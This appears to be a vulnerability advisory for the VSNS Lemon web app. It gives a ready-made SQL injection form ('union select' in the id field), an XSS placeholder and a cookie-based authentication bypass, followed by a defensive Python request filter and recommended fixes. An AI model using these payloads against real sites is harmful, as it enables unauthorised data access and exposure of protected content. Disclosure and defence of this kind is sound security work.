PoC/Exploit for Multiple Vulnerabilities in VSNS Lemon

Published Proof of Concept code - Multiple Vulnerabilities in VSNS Lemon.

Description: Available
Solution: Not available - check Tachyon website

1. SQL Injection Example.

  <form method="post" action="http://[host]/vsns/index.php">
    <input type="hidden" name="towel" value="checkpass">
    <input name="id" value="9999' union select 123,4,5,6/*">
    <input type="password" name="password" value="123">
    <input type="submit" value="Go">
  </form>

2. Cross-Site Scripting Example

Add Comment.

Example URL: http://[host]/vsns/index.php?towel=archive&type=id&id=1#vsns_comments_display

Name: [XSS]

3. Authentication Bypass Example.

Read any password-protected topic:

Cookie: vsns[topic_id] = 1
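
With no vendor fix listed, one stopgap is to screen requests before they reach index.php. The following is an added example, not code from the advisory or from VSNS Lemon. It assumes `id` is always a numeric topic id and that the comment form field is called `name`; `screen_request` is a hypothetical helper.

```python
import re
from urllib.parse import unquote

DIGITS = re.compile(r"[0-9]{1,10}")
MARKUP = re.compile(r'[<>"]')
TOPIC_COOKIE = "vsns[topic_id]"  # cookie named in the advisory


def screen_request(params, cookies):
    """Screen one request bound for index.php (hypothetical helper).

    params  -- merged GET/POST fields, str -> str
    cookies -- cookie names exactly as the client sent them, str -> str
    Returns (reasons, forwarded_cookies); non-empty reasons means reject.
    """
    reasons = []

    # 1. SQL injection: assume `id` is a numeric topic id and allow digits only.
    if "id" in params and not DIGITS.fullmatch(params["id"]):
        reasons.append("id is not a plain integer")

    # 2. XSS: the comment Name is echoed back. The field name "name" is an
    #    assumption; the advisory gives only the form label.
    if MARKUP.search(params.get("name", "")):
        reasons.append("comment name contains markup characters")

    # 3. Authentication bypass: the client asserts which topic it unlocked.
    #    Drop that cookie so protected topics fail closed. Older PHP releases
    #    URL-decode cookie names, so compare the decoded form too.
    forwarded = {
        name: value
        for name, value in cookies.items()
        if unquote(name).strip() != TOPIC_COOKIE
    }
    return reasons, forwarded


if __name__ == "__main__":
    # Constructed sample requests.
    print(screen_request({"towel": "checkpass", "id": "12", "password": "x"}, {}))
    print(screen_request({"towel": "archive", "type": "id", "id": "1"},
                         {"vsns%5Btopic_id%5D": "1", "PHPSESSID": "abc"}))
```

Stripping the cookie makes password-protected topics unreadable until the application keeps unlock state server-side; the lasting fixes are parameterised queries, output encoding of comment fields, and session-held authorisation.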
